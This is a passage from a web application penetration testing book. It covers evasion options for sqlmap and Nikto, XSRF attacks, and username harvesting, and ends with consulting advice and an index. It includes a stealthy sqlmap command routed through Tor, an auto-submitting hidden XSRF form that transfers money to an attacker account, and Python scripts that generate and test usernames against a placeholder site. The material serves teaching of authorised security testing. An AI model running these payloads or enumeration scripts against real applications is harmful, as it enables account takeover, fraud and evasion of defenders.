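The first command mixes our real address (ME) in with spoofed decoys, slows the probe rate, and sources packets from port 53; the second performs the idle scan described above by bouncing probes off an idle zombie host.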
Some of the various features of sqlmap were mentioned in Chapter 2, and we can expand upon that by looking into how to invoke various filter evasion options when utilizing the tool. As seen in Figure 11.2, the options invoked include --random-agent, --tor, --delay 12, --hpp, --dbms=mysql, and --tamper=unmagicquotes.py, as they pertain to options helpful for making our attack slightly stealthier.
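Assembled into a full command against a placeholder target, that looks like the following:

sqlmap -u "https://evilsite.info/xss.php?id=1" --random-agent --tor --delay 12 --hpp --dbms=mysql --tamper=unmagicquotes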
Running sqlmap without any of these options results in a lot of malicious traffic being sent from our machine with no hope of evading even the most basic detection tools. Conversely, in Figure 11.4, we can see the Tor exit node source address, a believable user agent, amply spaced requests (in terms of time delay), the HTTP parameter pollution, and the tamper effects all taking place as we specified, in the hopes of going unnoticed.
This next example takes another look at Nikto. In addition to changing the default user agent, we have a couple more options, such as modulating cAsE, URI encoding, and attempting to bypass detection filters by including random strings with each request. Another option to aid in our filter evasion endeavors is to tune the traffic Nikto sends to remove the checks we think will be fruitless, such as checks for elements associated with the target environment we know don't exist (like references to /etc/passwd, .ssh*, or .htaccess if the target system is Windows running IIS). In addition, we can tune Nikto to use only certain plugins, and use the tool more like a traditional scanning tool but with more specificity. Options for Nikto are shown in Figure 11.5.
These options increase our likelihood of finding a flaw based on previous recon efforts coupled with tuned scanning requests. For example, by invoking Nikto with the -evasion 6, -Plugins 2, and -Tuning e options, we can selectively choose to utilize "tab" as a space, have Nikto guess for password file names, and scan for administrative consoles. Running nikto.pl -H will show an extended menu where such options can be selected. The results of the scan as seen from the web server logs of the target machine show a targeted attack which would likely bypass some filters, but is still noisy and not necessarily doing what we told it to do. There is no evidence of tabs being used and no evident/real password filename guessing or admin console scanning, as we can see in Figure 11.6.
Beyond the OWASP Top 10
Details: This chapter will focus on two specific vulnerabilities: Cross-Site Request Forgery (XSRF or CSRF) and username harvesting (or account enumeration). While XSRF is no longer on the OWASP top ten list, it is still a prevalent vulnerability and worth our time discussing as, when exploited, it can lead to serious impact. Username harvesting is a subset of broken authentication and, in addition to being extremely prevalent, merits more discussion as it too can lead to significant user impact.
XSRF is an attack which takes advantage of the trust an application has in an established session. Reread the last sentence and absorb the depth of what it means. When we authenticate to a web application via basic, digest, integrated, or forms-based authentication, whether using two-factor, OAuth, or federated identity, we are proving we are who we say we are, and in turn being authorized to make subsequent requests with the level of privilege assigned to our account. We have authenticated successfully and, in turn, established our session. After authenticating, most applications don't require any additional checks or confirmation of our identity, regardless of what we request or what transactions we submit. This is the inherent trust the application has given to our established session. What XSRF does is take advantage of that trust by
tricking a user into submitting a transaction they did not intend to request. This victim-attacker-vulnerable-application relationship is reminiscent of XSS, but that is where the similarities begin and end.
The root cause of XSRF is a lack of transaction validation on the part of the web application; specifically, the application does not verify the user intended to make the request and blindly honors any request made by an authenticated user. If the user's level of authorization is sufficient for the request being made, then it is honored. The XSRF attack, in turn, instructs the victim to make a request on behalf of the attacker, and since the request originates (from the perspective of the application) from the authenticated user (the victim), the application handles the request as if nothing is amiss.
Several things are required in order for this attack to work: predictable parameters, a suitable payload, targeting a victim currently logged into the vulnerable application, proper timing, and a risky transaction. When the GET or POST parameters for a transaction remain static over time and a random, unpredictable cryptographic nonce is not included in the request, these are what are referred to as predictable parameters. This literally means, for example, that the "username" parameter is always called "username", the password parameter is always called "password", and so on; the values for each parameter are, of course, free for us to change. A typical example of XSRF would be a GET request making a banking transfer from one user's account to another user's account; when this request is invoked by the legitimate user, we see it as just regular functionality, but when the legitimate user is tricked into making this request and the application accepts it, this is an example of XSRF. For this to work, we as the attacker must first understand what a valid GET request looks like, which means performing reconnaissance on the target web application, commonly with our own test account. We proceed to leverage our browser and proxy to make the request and view the details, respectively. The request we make is the basis of our attack/payload; we merely need to alter the request to ensure money flows from the account of our choice to the account of our choice. The important thing to keep in mind is that the victim user will be making the request for us; a request which we control entirely.
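As a purely hypothetical illustration of predictable parameters, a vulnerable transfer request might look like the following, where every parameter name is static across users and sessions, and only the values change:

GET /transfer?from=victim-acct&to=attacker-acct&amount=5000 HTTP/1.1
Host: bank.example.com
Cookie: session=a1b2c3d4e5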
The idea of moving money maliciously is a good basis for an example, and at its crux it represents a risky transaction. If we send someone an email with a link to a Google search and the user clicks the link, this user will be the one making the Google search request even though we defined the details of the search, the query string. This is not XSRF because it fails to meet two of the requirements: the user does not need to be authenticated to perform
this request, and there is nothing inherently risky about submitting a search request (in most cases). The reason why the victim needs to be logged in to the application is because once authenticated, a user has the ability to take actions with their level of privilege. This could mean updating their password, making a financial transaction, adding a firewall rule, creating a new user, or anything else that we would classify as risky. Another important note is that while the example mentions a GET request, we can just as easily conduct an XSRF attack via a POST request.
Once we get to the point where we have identified the details of a risky transaction and confirmed it is vulnerable to XSRF, the next step is to craft our payload and host it somewhere or send it directly to the target victim. If the vulnerable transaction is a GET request, we could simply craft the suitable GET string and email it to the victim. If the victim were logged into her account at the time of receiving the email and clicking the link in the email, then our attack would likely work. This style of attack, however, would certainly not be stealthy, as the victim would be directed to the vulnerable page in her browser and see the results of the request (and likely become quite suspicious). An alternative way to get the victim to submit the request would be to host the GET request on a website via an HTML image tag <img src="https://example.com/attackparameters" /> and email the victim a link to this website. The image would not display (as it is not a valid image), but the victim's browser would parse the HTML image tag and make the request to example.com with the appended attack parameters. If we are able to get the victim to browse to our attacker-controlled website, we can of course launch other attacks against the user, but what makes XSRF special is that it doesn't break same origin policy (SOP), yet it impacts a completely separate domain. The reason why SOP is not being broken is because the source of the request, from the perspective of the vulnerable application, is the victim's browser and not our malicious website hosting the image link or JavaScript. Mentioning JavaScript is relevant because we can use it to automatically submit an XSRF POST request, unbeknownst to the victim, as soon as he browses to our malicious website.
If our payload delivery relies on a malicious string in email or on hoping a victim will browse to our website, how are we to know if the attack is successful? XSRF is actually a blind attack in the sense that we don't immediately know if it was successful. We can certainly monitor our server logs and see when a victim browses to our site, but we have no visibility into the transaction request sent to the vulnerable web application, and no indicator as to whether the victim is even currently logged into the vulnerable web application at the time of our attack. We can verify the attack worked by checking for the intended result of our attack, be that a new user account being added or money being sent to our bank account. While XSRF can be a powerful attack, there are several limiting factors which expedited its removal from the top ten list, such as the ease of implementing automated defense mechanisms and, of course, the complexities involved with launching a successful attack. Even so, XSRF remains a common vulnerability. However, an even more common vulnerability is username harvesting.
Username harvesting, also referred to as account enumeration, is an attack which allows us to automate the harvesting of valid (currently registered or otherwise in-use) web application accounts; specifically, account usernames. Not only is this attack very easy to perform in most situations, but the flaw is also very easy to identify. A common way to discover username harvesting vulnerabilities is to submit an invalid username to the login, password reset, and account creation components of the application, and observe how the application responds. We then take the exact same actions, only this time we use a valid username, and note the differences in how the application responds to us submitting a valid versus an invalid username. Once again, valid means the account/username exists in the database, whereas an invalid username still meets the requirements of a username but has not been registered to a user account.
This approach is predicated upon the idea that we know at least one valid and one invalid username. We can have a high level of confidence that a username made up of 15+ gibberish characters is probably not valid. Conversely, jsmith, [email protected], kjohnson, and other appropriately common usernames (depending on the context of the application) are good starting points for testing how the application responds to a valid username.
In modern, convenient, and user-friendly web applications, it is extremely challenging to allow a user to create their own account or reset their password and not be vulnerable to username harvesting. This is because the developer and business are choosing convenience over security, meaning it is more convenient to clearly tell users when a username has already been taken than to show a generic error message and avoid the vulnerability. Merely communicating to the user/attacker when an account name has already been registered is the vulnerability. Our job as attackers is to automate the guessing and confirmation of a large quantity of valid usernames, and proceed to launch additional attacks against the user accounts once armed with this knowledge.
To reiterate the flaw for clarity, imagine the account creation process for Gmail or any other public webmail service. When creating a new Gmail account, we are presented with an account creation page which includes an input for us to choose our desired username. Since the username will become our email address, and each user's email address has to be unique, Gmail will not let us choose an email address which already exists. If we try to do so, the website will clearly communicate that our desired username has already been taken, and we must choose another one. This notification is the flaw, and we can leverage it as the indicator that a given username is valid. To further attack the system, however, we need to automate the request process and response parsing, meaning submitting email addresses and extracting the error message or response code to determine if an email address is currently in use or not.
In addition to the account creation page, we want to focus on password reset pages and login pages; anywhere the application has to make a logical determination as to whether an account exists, including authenticated pages. Launching the attack is typically best carried out with our interception proxy: Burp's Intruder or ZAP's fuzzer. This is because we can prime these tools with the appropriate request, and then grep/find the verbiage or response code indicator in the resulting HTTP response, which we will use to make note of the requested username being valid or invalid. The goal is to automate the attack and gather valid usernames. With a large quantity of valid usernames, we can proceed to launch credential stuffing or phishing attacks. Malicious attackers could use this same list of valid usernames to launch a DoS attack, effectively locking out all of the users by scripting multiple failed login attempts, if the application supports account lockout.
Real-World Dialog: While testing one such application, I attempted injection attacks on the form's input fields, which proved to be fruitless, and eventually turned my attention to XSRF. In reviewing the applicable POST request, I was able to determine there were no apparent XSRF protection mechanisms in place, so using Burp's XSRF PoC functionality I generated an attack form and proceeded to validate the vulnerability. Attacking users of the application was not in scope for this test, but the risk seemed clear; the finding was valid and clearly communicated in the report to the client. Less than 48 hours had elapsed since the report was shared with the client, and they had already implemented a fix in their production application. They requested I retest the finding; since the report was to be used in their PCI audit, all high-risk and medium-risk findings were likely going to be addressed. I logged back into my test account for the application and, with Burp passively watching my requests, I noticed they had implemented an anti-XSRF mechanism based on the aptly named custom parameter "anti-xsrf-token". Upon logging out and back in, and refreshing the page, I could see the randomness of the parameter's value seemed to be adequate, as was its length; at first blush they seemed to have implemented a solid fix. When generating another PoC, however, I decided to simply remove the value of the token and resubmit the request. The attack worked!
The client did a great job of setting the token, but failed to actually check that the same token (or any token) was sent back with the transaction request.
Figure 12.3 Search engine query results showing more than we asked for.
Exploring the method of using some custom tools to create our own list will be useful both for creating usernames based on email addresses and for general usernames. A logical place to start is the U.S. Census, as shown in Figure 12.4.
Figure 12.4 A U.S. Census page providing links to popular surnames. Helpful indeed.
Downloading and unzipping the ZIP provides access to CSV and XLSX files, and viewing the CSV shows the 162,253 most common surnames in an easy-to-digest format. We can see the output of the file download in Figure 12.5.
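A few lines of Python are enough to turn such a surname list into candidate usernames. This sketch assumes a file named surnames.csv with the surname in the first column; the username formats (first initial plus surname, and a corporate-style email pattern) are common conventions, not anything dictated by a particular target.

import csv
import string

candidates = []
with open("surnames.csv", newline="") as f:
    reader = csv.reader(f)
    next(reader)  # skip the header row
    for row in reader:
        surname = row[0].lower()
        for initial in string.ascii_lowercase:
            candidates.append(initial + surname)  # e.g., jsmith
            candidates.append(f"{initial}.{surname}@evilsite.info")

with open("usernames.txt", "w") as out:
    out.write("\n".join(candidates))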
Returning to XSRF, we can use Burp (in the Pro version) or ZAP to create an XSRF PoC and test the application to determine its susceptibility. Most transactions or requests that have to do with account provisioning, modification, deletion, passwords, financial transactions, PII, PCI, and the like are candidates for being classified as risky. However, we do need to take into account the context of the flaw; for instance, if the application doesn't protect against XSRF attacks for a request to POST to a blog, what is the risk? If we can couple the XSRF attack with a POST request containing PII, sensitive information, or even scripts, then arguably this might be a high-risk finding. In other words, leveraging XSRF to attack an application with a stored XSS string is likely a high risk.
Once browsing the application with our interception proxy running in tandem, we want to submit the request like a normal user would (this requires a test or compromised account) and then, from within ZAP, right-click the request and select "Generate Anti-CSRF Test FORM", as we can see in Figure 12.7.
Figure 12.7 ZAP's interface allowing a CSRF PoC based on a POST request.
Doing this will result in a very basic HTML page with a single submit button. When we click the submit button, the exact same request we just submitted will be submitted again. The difference is we can, and should, alter the input values to define the values we desire; for instance, moving money from one account to another or submitting a firewall rule. ZAP's generated PoC code will serve as the attack framework we will ultimately get our victim to submit for us, and while it is basic, it need not be any more complex, as it will be hidden on a different page and ideally automatically submitted without the victim ever seeing it. An example of the PoC code is shown in Figure 12.8.
With this knowledge, let's explore some examples of both username harvesting and XSRF.
Examples: Continuing with the XSRF attack, we need to host the payload somewhere, as it is a POST request and can't be sent to the victim as easily as a GET request. With the same idea in mind, though, sending our victim something requiring their interaction, we can send the victim a link to a website we control. The goal would be to have the victim click the link, conceivably in an email, and be directed to our website, which will be hosting the XSRF attack and payload. Once again, identifying an XSRF vulnerability is not overly challenging, nor is creating a suitable payload or even getting our victim to click on a link. What can be difficult, however, is timing the attack to coincide with a moment in time (and in the same default browser) when the victim is logged into the vulnerable application. This is the final piece of the attack; the victim has to be actively logged into the application we are attacking in order for our attack to be carried out. In a Windows AD environment where the application we are attacking has implemented Windows pass-through authentication, XSRF is ideal, as there is a high probability the user is always logged in. In other web-based applications this is not always the case. There are some situations where we will have knowledge of ideal times to launch our targeted XSRF attack, and other situations where we need to send the attack and hope for the best, or continually host it and indiscriminately attack users (depending on our goals). We will proceed to set up the landing/attack page without regard to the latter, as it will be configured the same in either case. A seemingly harmless-looking website (Figure 12.9) can be used as the front end for the XSRF attack.
However, viewing the HTML source code of the page reveals our attack, which is essentially the PoC from ZAP with a slight modification. Other than incorporating a theme and design into the HTML, we have also added JavaScript, which is responsible for automatically submitting the POST request to the vulnerable application as soon as the page finishes loading. By creating the website in this manner, the victim is presented with what appears to be a benign website while in the background our malicious code instructs the victim's browser to make the POST request of our choosing. We can see the source code in Figure 12.10.
Figure 12.10 HTML and JavaScript used to submit the POST request.
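Stripped of the theme and design, the core of such a page might look like the sketch below; the form action, parameter names, and values are placeholders standing in for the vulnerable application's real transaction:

<html>
  <body onload="document.forms[0].submit()">
    <!-- Submits the risky transaction using the victim's session -->
    <form action="https://vulnerable.example.com/transfer" method="POST">
      <input type="hidden" name="to" value="attacker-acct" />
      <input type="hidden" name="amount" value="5000" />
    </form>
  </body>
</html>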
The caveat to this method of payload delivery is that the victim's browser will be directed to the vulnerable application upon submitting the POST request. By adding more code to open a new tab, submitting the request from that tab, and then closing the tab (or other such concepts), we could potentially make the attack more clandestine. Another option would be to deliver the payload via a GET request in a hidden image tag, as shown in Figure 12.11.
Figure 12.11 Launching an XSRF attack via a GET request and hiding any broken image icon.
These methods work well for executing the XSRF attack in different circumstances, and can be modified to meet the needs of the attacker. Let's again refocus our attention on some examples of exploiting username harvesting.
Recall that the goal of a username harvesting attack is to identify, with confidence and in an automated way, valid application accounts. Ultimately we will try a credential stuffing attack, but initially we are not trying to log in to any of the accounts. In practice, most businesses (and by extension, web applications) choose to communicate to end users when a provided username is incorrect, and we need to be able to identify and extract this message from the HTTP response to our login, account creation, forgotten password, or other suitable request. Several examples of this behavior are shown in Figure 12.12.
12.12.
In looking at the error messages the verbiage is clear and we can use this to
conrm a submitted username is valid. Using Burp and our browser, we will
navigate to our target application, proceed to make an initial account cre-
ation request, and view the resulting HTML. Next, we will send the previous
request to Intruder, choose the "Sniper" attack, and populate the payloads
tab with a single set of usernames. The usernames should be provided in
the format of one username per line in the le. Looking more closely at the
initial Sniper attack, we need to clear all of the predened injection points,
and choose the one single point where the submitted username resides as
this single parameter value is where we need to focus the attack. We can see
this in Figure 12.13 whereas Figure 12.14 will show the options of applicable
payloads.
Figure 12.14 Uploading our file containing usernames to Burp's payload section.
Once we properly choose the injection point and successfully input the list of usernames we want to test, we proceed to the "Options" tab to set up a "Grep - Match" rule which will serve as our indicator of a valid username. We leverage the error message previously discovered, and populate the rule with this string, as long as it is unique and will only be displayed when a valid username is submitted. Using the string "Choose a different address" should suffice for this example, as we can see in Figure 12.15.
Figure 12.15 Using Burp's Grep - Match option to serve as an indicator of success.
Next we launch the attack by clicking "Start Attack" in the top right-hand corner of any Intruder tab. The results of the attack are shown in Figure 12.16.
Figure 12.16 Viewing results of the Intruder attack noting valid usernames.
Note the free version of Burp does not allow us to save the results, does not allow configuring granular timing for the attack, and throttles our requests; all of these reasons make the free version almost useless in a professional engagement but adequate for testing. We could easily reproduce this attack with a custom script or ZAP, but we do want to have a way to save the results so we have a definitive list of valid usernames.
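A minimal sketch of such a custom script follows; the endpoint, parameter name, and error string mirror the hypothetical example above and would need to be adapted to the real application (a real engagement would also account for rate limiting and session handling):

import requests

TARGET = "https://evilsite.info/register"    # hypothetical endpoint
INDICATOR = "Choose a different address"     # valid-username indicator

valid = []
with open("usernames.txt") as f:
    for username in (line.strip() for line in f if line.strip()):
        resp = requests.post(TARGET, data={"username": username}, timeout=15)
        if INDICATOR in resp.text:
            valid.append(username)
            print("valid:", username)

with open("valid_usernames.txt", "w") as out:
    out.write("\n".join(valid))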
Depending on the verbiage to grep for, the format of the usernames, and the like, the complexity of getting the attack to work will be influenced heavily by the way the web application has been implemented. While there are not usually specific security features aimed at preventing this attack, we will at times have to contend with session timeouts, cookie reuse issues, and excessive request filtering protections, which will slow down our attack but not stop it. The next logical course of action, once we have a quantity of valid usernames, is to proceed with a credential stuffing attack, which works the same way as the username harvesting attack in principle, the only differences being the use of two sets of payloads and a different attack type: valid usernames, password guesses, and a "cluster bomb" Intruder attack type. In addition, depending on the rules of engagement and needs of the business, we can
leverage our vast quantity of usernames to launch spear phishing attacks and, in rarer circumstances, perhaps lock out user accounts.
Testing as a Consultant and Adding Value
The report also needs to include confirmation of the scope of targets, a robust description of the methodology used to test, a table of contents, and information regarding the testing dates, points of contact, and an appendix with automated scan results and other applicable documentation.
While this has been discussed intermittently throughout the book, know that every finding is context-specific, and assigning default CVSS scores and risk ratings to findings is not sufficient. We need to take into account the demonstrated risk of the identified flaw and produce a custom risk score for each vulnerability we find, regardless of exploitation. One final note on the deliverable of the report: prior to sending, discuss how the report is to be delivered (encrypted, GPG, shared via the cloud, emailed). We don't want detailed paths to exploitation of the client environment to be shared unencrypted.
Adding value as an in-house penetration tester involves knowing our environment and establishing relationships with other teams. In fact, these are the two main advantages in-house penetration testers have over outside consultants. We want to maximize the benefits of knowing what protections are in place, how code is deployed, which servers are running which software, where PII resides, and the like to, in effect, conduct a white box penetration test focusing on what we already know to be the weakest links.
The other way we can add value in-house is by talking to our counterparts on the development team, our security champions, or like-minded, security-conscious developers. Ideally, we want to work together to address security shortcomings, but also to ensure a smooth test and to stay abreast of new software being released, new technology being researched, and timelines for incorporating fixes into the codebase. In a DevSecOps environment we can also ensure our automated scanning and other security processes are taking place, providing value, and constantly being tuned to the applications in the pipeline. This concept of providing value is a nod to the fact that security is a cost center, and one of the main functions of this cost center is to help reduce risk and keep costs lower by reducing threats and attack surface, and ultimately preventing a breach or similar unwanted consequences. We can work to accomplish these goals by gaining a deep understanding of the environment and constraints of the business. With this knowledge we can proceed to recommend the best course of action to protect the business. From a consultant's perspective, we add value by being easy to work with, meeting expectations, and delivering a thorough, high-quality penetration test and accompanying report. Although technical acumen is a requirement, there is more to penetration testing than that, and as the humans behind the tools, we are ultimately the ones who add that value.
Index
API, 6, 22, 62, 72, 73, 75, 78, 92, 95, 119
Black Box, 6, 146
Burp Suite, ix, 17, 21, 32, 36, 39, 60, 81, 116, 129, 140, 143, 175, 192, 193
Command Injection, 28
Cookies, 7, 32, 39, 89, 122, 125, 126, 131-133, 175, 194
Cracking, 47-49, 94
Credential Stuffing, 35, 39, 110, 168, 177, 191
Denial of Service, 2, 75
Deserialization, 137-139, 143, 147, 148
Google Dorks, 82, 84, 107, 114, 186
HIPAA, 5
HITRUST, 5
HSTS, 44, 45, 49, 53
JWT, 90, 92, 94
Logging and Monitoring, 167, 168, 170, 177
Nikto, 155-158, 174
nmap, 102, 109, 167, 172
NoSQL Injection, 22
PCI, 5, 7, 11, 35, 45, 183, 184, 188
Programming Languages, 32, 77, 126, 130, 133, 144
Rules of Engagement, 5, 7, 44, 122, 168, 170, 196
SQL Injection, 9, 10, 12, 15, 17, 19
sqlmap, 19
WAF, 3, 5, 7, 35, 62, 99, 153, 170, 171, 173
XSRF, 121, 179-181, 183, 187, 189, 194
XSS, 107, 119, 121, 123, 126, 131, 136, 159
XXE, 55, 58, 59, 62, 68, 72, 76, 139
ZAP, ix, 63, 65, 67, 70, 88, 92